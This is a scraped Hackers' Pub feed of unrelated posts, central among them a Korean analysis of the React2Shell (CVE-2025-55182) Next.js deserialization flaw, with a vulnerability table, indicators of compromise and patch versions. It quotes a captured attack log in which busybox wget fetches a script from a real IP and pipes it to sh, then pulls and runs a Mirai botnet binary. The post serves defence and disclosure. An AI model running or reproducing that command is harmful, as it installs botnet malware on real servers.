Hackers' Pub is a place for software engineers to share their knowledge and experience with each other. It's also an ActivityPub-enabled social network, so you can follow your favorite hackers in the fediverse and get their latest posts in your feed.
요즘 마리의 귀염 포인트. 마리는 11시쯤 밥을 먹는데 1/3쯤 남겨뒀다가 우리가 12시쯤 밥 먹을 때 자기도 가서 마저 먹는다. 우연인가 했는데 요며칠 내내 그러네.
청년 암 경험자들은 일자리 찾기가 치료만큼 힘들다고 호소합니다. 이제 막 사회에 진출하는 청년들은 경력이 없거나 짧아 더 막막합니다.
“암 환자였어요? 채용 못 합니다”…치료만큼 힘든 20...
I am so grateful for the Fediverse 
That's all. That's the post.
#Fediverse
5 practices that are considered ‘common wisdom’, and why it’s worth reconsidering them.
1. Don’t reinvent the wheel - find a package
2. Every PR must be reviewed
3. 2-4 week sprints are how modern teams work
4. Every code change should be behind a feature flag/gate
5. If a comment is needed, the code is too complex
https://newsletter.manager.dev/p/5-engineering-dogmas-its-time-to
I knew a few people who worked at Mozilla in ‘good times’ and Twitter ‘after’ and they all said Mozilla on a regular day was a much more confusing and toxic org. I think Mozilla will go down in history as the one that squandered every opportunity and chased the wrong thing
Do you ever have the experience of listening to a song for decades and then finally looking up the lyrics only to find out it wasn't as cool as you thought it was all this time? XD
Choose the best holiday gift!
Is it late?
요즘 마리의 귀염 포인트. 마리는 11시쯤 밥을 먹는데 1/3쯤 남겨뒀다가 우리가 12시쯤 밥 먹을 때 자기도 가서 마저 먹는다. 우연인가 했는데 요며칠 내내 그러네.
Going to start referring to people bringing ai “art” etc where it’s not wanted, as Sloperatives.
https://www.pbs.org/newshour/nation/merriam-websters-word-of-the-year-for-2025-is-ais-slop
No, you’re not a “prompt engineer”, you’re a sloperator.
今日のラクガキはアウグストかブレマートンか激エロブリーフおじさんにしようかな
청년 암 경험자들이 취업 등 다시 일상으로 복귀할 수 있도록 지원하는 사회적 시스템이 마련돼야 한다는 목소리가 커지고 있습니다. 정부가 암 경험자를 위한 다양한 지원을 하고 있지만, 청년층 대상 사업은 미흡합니다.
청년 암 경험자 느는데…사회복귀 위한 실태파악·지원은 ...
Israel Propagandists Are Uniformly Spouting The Exact Same Line About The Bondi Shooting (Caitlin's Newsletter, 2025-12-17)
https://www.caitlinjohnst.one/p/israel-propagandists-are-uniformly
———
>> ... They are not trying to stop chants [like “globalize the intifada”] which they perceive as dangerous, they are trying to stomp out criticism of Israel’s genocidal atrocities.
>> … Saying “globalize the intifada” isn’t calling for people to massacre Jewish civilians around the world, it’s advocating resistance to the power structure which incinerated #Gaza and continues to inflict abuse upon Palestinians and any other population which doesn’t bow to the interests of the empire.
>> ... They’re fully aware that they’re using a tragic mass shooting as a political cudgel ... This is just one more cynical manipulation aimed at protecting Israel from criticism so that it can inflict more violence and suffering upon the world.
#CaitlinJohnstone #palestine #GlobalizeTheIntifada 
@palestine@lemmy.ml 
@palestine@fedibird.comPalestine_Group
인질이 쫌 비싸네요
deliberately leaving typos in my posts as a symbol of authenticity, like flaws in a handwoven rug.
my words won't slide through your eyes with machine-woven perfection: good. that's my intent.
if your brain snags on an errant metaphor or the warp of your brain struggles with an irregularity of wording; if your weave of knowledge is overturned by a turn of phrase turned arsy-versey or if a typo trips you up: good. that's my intent.
I'm a poet. that means I'm allowed to do this shit.
ちょっと早いけど午後をやっつけちゃいましょうね〜
deliberately leaving typos in my posts as a symbol of authenticity, like flaws in a handwoven rug.
Israel Propagandists Are Uniformly Spouting The Exact Same Line About The Bondi Shooting (Caitlin's Newsletter, 2025-12-17)
https://www.caitlinjohnst.one/p/israel-propagandists-are-uniformly
———
>> ... They are not trying to stop chants [like “globalize the intifada”] which they perceive as dangerous, they are trying to stomp out criticism of Israel’s genocidal atrocities.
>> … Saying “globalize the intifada” isn’t calling for people to massacre Jewish civilians around the world, it’s advocating resistance to the power structure which incinerated #Gaza and continues to inflict abuse upon Palestinians and any other population which doesn’t bow to the interests of the empire.
>> ... They’re fully aware that they’re using a tragic mass shooting as a political cudgel ... This is just one more cynical manipulation aimed at protecting Israel from criticism so that it can inflict more violence and suffering upon the world.
#CaitlinJohnstone #palestine #GlobalizeTheIntifada @palestine@lemmy.ml @palestine@fedibird.comPalestine_Group
5분만 더 자야지.....라고 마음을 먹으면 항상 1시간이 지나버린다
Juntai Park shared the below article:
고남현 @gnh1201@hackers.pub
외부에서 수신된 특정한 규격에 따라 구조적으로 작성된 데이터를 처리한다면, 공격자가 어떠한 의도를 가지고 있다면 데이터를 보낼 때 실행 가능한 악의적 코드를 같이 넣어 보낼 가능성을 배제할 수 없다.
이것이 보안 약점이 되지 않기 위해선 이러한 공격자의 의도를 막아야하지만, React2Shell (CVE-2025-55182) 취약점은 이러한 공격자의 의도를 막지 못하고 실행을 무제한 허용하는 방법이 발견된 것이다.
특정한 규격에 따라 구조적으로 작성된 데이터를 처리하는 과정을 일컫는 용어를 "역직렬화"(Deserialization)이라고 한다.
특정한 규격은 잘 알려진 JSON, XML, YAML가 될 수도 있고, 자체 규격이 될 수도 있고, 혼합형이 될 수도 있다. React2Shell 취약점은 혼합형(JSON + aka. Flight)을 사용하였다.
자체 규격(aka. Flight)이 JavaScript로 정의된 객체의 성격을 임의로 변경(Prototype 개념 상 존재하는 생성자 수준의 속성(__proto__, constructor)에 접근하여 객체의 성격을 임의로 바꿀 수 있음)하는데 필요한 접근성을 가지고 있었기에 가능한 것이었다.
실무적으로 역직렬화 과정이 위험해지는 이유는 다음과 같다.
이 외에도 역직렬화 과정은 유사한 여러 취약 가능성을 가지고 있기 때문에, 역직렬화 과정을 보호하기 위한 여러 보완 장치의 구현이 필요하다.
역직렬화 취약점이 어떤 성격을 가지는 취약점인지 빠르게 이해하기 위해선, 역직렬화 취약점과 연관이 있는 취약점 사례와 공통적인 특징을 살펴볼 수 있다. 그 사례는 다음과 같다.
| 언어 / 생태계 | 역직렬화 취약점 사례 | 주요 공통점 |
|---|---|---|
| Java | CVE-2021-44228 (Log4Shell), CVE-2017-9805 (Apache Struts2 REST), CVE-2020-8840 (jackson-databind) | 외부 입력이 객체 생성·역직렬화 경로(JNDI, XML/JSON 바인딩) 로 유입되어 gadget chain 또는 원격 클래스 로딩을 통해 RCE 발생 |
| .NET (C# / VB.NET) | CVE-2019-18935 (Telerik UI), CVE-2025-53690 (Sitecore ViewState), CVE-2020-25258 (Hyland OnBase) | BinaryFormatter·ViewState 등 레거시 역직렬화 포맷을 신뢰하여 임의 타입 로딩·코드 실행 |
| Python | CVE-2017-18342 (PyYAML unsafe load), CVE-2024-9701 (Kedro ShelveStore), CVE-2024-5998 (LangChain FAISS) | pickle·unsafe YAML 로더 사용으로 역직렬화 자체가 실행 트리거 |
| PHP (WP) | CVE-2023-6933 (Better Search Replace), CVE-2025-0724 (ProfileGrid), CVE-2024-5488 (SEOPress) | unserialize() / maybe_unserialize()에 사용자 입력이 전달되어 PHP Object Injection(POP chain) 발생 |
| Ruby | CVE-2013-0156 (Rails YAML.load), CVE-2020-10663 (RubyGems Marshal) | YAML.load·Marshal.load 사용 시 임의 객체 생성 → 코드 실행 |
| JavaScript / Node.js | CVE-2025-55182 (React2Shell), CVE-2020-7660 (serialize-javascript) | 구조 복원·객체 재구성 로직이 신뢰되지 않은 입력을 코드/객체로 해석 |
| Go | CVE-2022-28948 (go-yaml Unmarshal), CVE-2020-16845 (HashiCorp Consul) | Unmarshal 단계에서 입력 검증 부족 → 구조체 복원 기반 로직 붕괴·DoS |
| Rust | GHSA-w428-f65r-h4q2 (serde_yaml / unsafe deserialization, CVE-2021-45687) | 메모리 안전과 무관하게 serde 기반 역직렬화에서 신뢰되지 않은 데이터가 내부 타입으로 복원되어 로직 오염·DoS·잠재적 코드 실행 위험 |
| Kotlin / Android | CVE-2024-43080 (Android) / CVE-2024-10382 (Android Car) | Intent/Bundle/IPC 역직렬화 시 타입·검증 미흡 → 권한 상승·DoS |
| C / C++ | CVE-2024-8375 (Google Reverb, Related to gRPC and protobuf) | Unpack 과정에서 데이터타입(VARIANT), vtable 포인터 오염 등 무결성 검증 부족 |
| Swift / iOS | CVE-2021-32742 (Vapor) | 외부 입력을 디코딩/객체 복원 시 신뢰 경계 붕괴 → DoS·정보 노출 |
| 산업용 (ICS/OT) | CVE-2024-12703, CVE-2023-27978 (Schneider Electric), CVE-2025-2566 (Kaleris Navis N4), CVE-2023-32737 (Siemens SIMATIC) | 프로젝트 파일·관리 서버 입력을 신뢰된 내부 데이터로 가정하고 역직렬화 → RCE 및 물리 시스템 영향 가능 |
역직렬화 취약점은 언어와 환경을 가리지 않고 다양하게 나타나고 있으며, 발견된 역직렬화 취약점은 취약점 점수(CVSS 3.x)에서도 8.0에서 10.0 범위의 매우 높은 점수를 받고 있다.
역직렬화 취약점이 어떤 공통적인 특성을 가지는지 설명했으니, 이제 React2Shell 공격의 개념증명(PoC)에서 보인 공격 특성을 사전 정보(공격 대상인 RSC의 내부 이해)가 없이도 어느정도 파악할 수 있다.
여기 각각 JavaScript와 Python으로 작성된 주요 공격 개념증명 코드가 있다.
여기서 알 수 있는 정보는 다음과 같다.
@
Evan Prodromou
Richard "RichiH" Hartmann
시오
earthling
わしゃ__proto__, constructor )를 통해 Prototype을 변조할 수 있는 접근성을 가지고 있다는 것을 알 수 있다. 용어로는 "JavaScript prototype pollution"라고 한다.then 키워드를 통해 공격 대상 내부에 존재하는 Promise 객체에 붙겠다(또는 새로운 Promise 객체를 만들겠다)는 의도를 확인할 수 있다.value 필드 값이 아직 역직렬화 되기 전의 문자열 형태의 JSON인 것으로 봤을 때, 공격 대상 내부에서 JSON.parse 메소드의 호출을 예상할 수 있다._response._prefix 의 주입은 then 키워드가 등장하는 위치와 최대한 가까운 곳에서 일어나야 한다. 그래야 Promise 객체가 공격 코드를 트리거할 수 있기 때문이다.then 속성을 가지면서, 공격 코드를 수용할 수 있는 가장 연관성 높은 표현이라는 점을 모두 만족하는 부분은 {"then": "$Bx"}라는 것을 알 수 있다. $Bx를 처리하는 과정 중 (또는 $Bx가 처리한 결과에 대한 사후) 검증이 부족하다는 의미이다.Next-Action 헤더는 애초에 이 취약점의 원인이 된 어떤 기능을 켜고 끄는 것에 관한 것임을 예상할 수 있다. 개발된 앱에 존재하는 유효한 액션에 대한 Key를 알 수 있다면 그 액션의 실행을 요청함으로서 공격 코드 또한 실행할 수 있을 것이다.Catswords OSS로 제보된 내용에 따르면, React2Shell에 노출된 서버는 이런 명령이 들어온다고 한다. 한 회원이 학습용으로 구축한 React 서버에서 발견된 로그이다.
(busybox wget -q http://193.34.213.150/nuts/bolts -O-|sh; \
cd /dev; \
busybox wget http://31.56.27.76/n2/x86; \
chmod 777 x86; \
./x86 reactOnMynuts)이 파일의 정체는 Mirai botnet이라 부르는 계열의 악성코드이다. React2Shell에 취약한 서버들은 이런 악성코드들을 서버에 주입받게 된다.
그럼 이 악성코드의 명성(?)은 어느정도일지 한번 체크해보자.
(그래 너 나쁜거 알았으니 그만 알아보자)
관련 IoC 는 다음과 같다.
3ba4d5e0cf0557f03ee5a97a2de56511 (MD5)858874057e3df990ccd7958a38936545938630410bde0c0c4b116f92733b1ddb (SHA256)http://193.34.213.150/nuts/bolts (URL)http://31.56.27.76/n2/x86 (URL)범용 botnet이 설치되기 때문에 사실상 DDoS 공격 등 다양한 목적으로 악용되는 서버가 된다.
추가 분석은 아래 링크에서 확인할 수 있다.
Next.js를 사용하는 서버라면 취약점이 해결된 버전으로 업데이트하여야 한다. Next.js의 개발사 Vercel은 취약한 버전에 대해 다음과 같이 안내하고 있다.
| Vulnerable version | Patched release |
|---|---|
| Next.js 15.0.x | 15.0.5 |
| Next.js 15.1.x | 15.1.9 |
| Next.js 15.2.x | 15.2.6 |
| Next.js 15.3.x | 15.3.6 |
| Next.js 15.4.x | 15.4.8 |
| Next.js 15.5.x | 15.5.7 |
| Next.js 16.0.x | 16.0.10 |
| Next.js 14 canaries after 14.3.0-canary.76 | Downgrade to 14.3.0-canary.76 (not vulnerable) |
| Next.js 15 canaries before 15.6.0-canary.58 | 15.6.0-canary.58 |
| Next.js 16 canaries before 16.1.0-canary.12 | 16.1.0-canary.12 and after |
혹여 업데이트에 곤란을 겪고 있는 경우, Vercel에서 공식 제공하는 패치 도구를 활용하는 것도 좋은 방법이 될 수 있다.
Next-Action 헤더 + 시스템 OS 명령어 + 자바스크립트의 Array 또는 Object 관련 메소드, 이렇게 3요소가 같은 요청에 동시에 들어있는건 흔한 상황은 아니라는 점을 고려해서 차단 규칙을 만드는 것도 방법이 될 수 있다.
말의 온도가 따듯한 사람은
마음씨도 따듯하다.
다정한 성품이 묻어 나와서, 때문에 대신, 덕분에라고 말하는 사람.
그런 사람과는, 함께하면 기분이 좋아지고 흐뭇하다.
따듯한 말로, 세상을 환하게 하는 사람이 좋다.
청년 암 경험자들이 취업 등 다시 일상으로 복귀할 수 있도록 지원하는 사회적 시스템이 마련돼야 한다는 목소리가 커지고 있습니다. 정부가 암 경험자를 위한 다양한 지원을 하고 있지만, 청년층 대상 사업은 미흡합니다.
청년 암 경험자 느는데…사회복귀 위한 실태파악·지원은 ...
사진 안올라감
대강 뭐 나올 거에요만 해놓기는 역시 좀 그래서, 주말동안은 힘내서 블배온 샘플 올려볼 수 있게 해야겟으... 이 샘플 중 하나는 완성하겠지요 모드로...
Zotz, having discovered laps, is making up for lost time. #catsofmastodon #zotz
Post AI slop? Temporary mute.
Post AI slop again? Block.
ねてた
O hive mind: Can you point me to 501(c)(3) nonprofit news organizations that are explaining the depth and breadth of Trump world corruption? The "mainstream" press is doing such an abysmal job on this, and I want to donate to journalists who get why this is so important to flag for public notice.
Autonomy & AI Day | Highlights | Rivian www.youtube.com/watch?v=EnkN...
Autonomy & AI Day | Highlights...
O hive mind: Can you point me to 501(c)(3) nonprofit news organizations that are explaining the depth and breadth of Trump world corruption? The "mainstream" press is doing such an abysmal job on this, and I want to donate to journalists who get why this is so important to flag for public notice.
암 이겨냈는데 ‘채용 차별’에 우는 청년들…“1차 서류 심사도 탈락”
www.hani.co.kr/arti/society...
"오씨는 “채용 공고를 낸 업체 53곳에 하나하나 전화해 ‘암 경험자들도 이력서를 낼 수 있냐’고 물었더니 1곳 빼고는 채용이 어렵다는 의사를 내비쳤다”고 말했다. 이유를 물어보니 “암 경험자를 채용한 적이 없고 그들에게 필요한 제도나 인프라가 없다는 대답을 들었다”고 했다. 암 경험자는 뭔가 몸이 약하고 일하기 힘들 것이라는 편견이 작동하고 있는 셈이다."
암 이겨냈는데 ‘채용 차별’에 우는 청년들…“1차 서류...
일하러가자
Americans!
If the massive number of internet censorship bills already introduced wasn't enough, Lindsey Graham, along with a handful of co-sponsers (Durbin, Blumenthal, Whitehouse, Klobucher, and Hawley), intends to reintroduce his bill to sunset Section 230 next week.
Section 230 is what allows many websites to exist at all. If this bill passes, many smaller websites will be forced to shut down, and mainstream platforms will either abandon moderation altogether or remove anything even vaguely controversial to avoid lawsuits.
Regular people would be unable to post on sites that take the latter approach (acting as publishers) and would have their voices drowned out by scams and hate speech on sites that take former approach (abandon moderation entirely).
Getting rid of Section 230 would not result in more free speech, it would not "hold Big Tech accountable," or whatever else people like Graham and these co-sponsers say repealing Section 230 would accomplish.
Please call your Senators and Representatives!
https://www.badinternetbills.com/
#Privacy #FreeSpeech #Censorship #Internet #DigitalRights #Section230 #US #UnitedStates
POLL: Do you know my steez?
ライブビューイングされる講義ってなに
It's a big month! PHP 8.1 is EOL on the 31st.
Barring any unforeseen emergency security releases, this week will mark the final PHP 8.1 release.
RE: https://mastodon.social/@blogdiva/113642963558607018
just found out the first 5 years after cancer therapy are the most critical for my longevity. been so busy catching up with living after 2 years of battling cancer, i forgot it’s my first year #cancerFree
one year and 4 days ago, i fucked cancer into the sea, thanks to NYS and #NYC public health systems. may i have many more to battle the fascistocracy who want us dead by dismantling #Obamacare.
free health care is a human right. abolishing health capitalism is our antifa duty. #fuckCancer
Transgender women are just as much aided by estrogen therapy as women who are not transgender are, if not more.
All women and girls deserve better from the medical establishment.
RED ALERT
U.S.-based independent contractors, like myself, are about to have our health care costs triple.
Many of us have two weeks to reinvent ourselves and this WILL harm Free and Open Source efforts.
At best, we will volunteer less. At worst, key contributors will cease participation.
I am happy to discuss strategies to preserve what so many have worked to hard to build.
리디에서 만화,웹소 말고 일반 도서 구입할 땐 꼭 도서 > 이 달의 쿠폰 > 모두 받기 > 구입 때 10% 할인 자동 적용해서 사세요.
블배온 본3)가온뉘 
쿼리링
McK
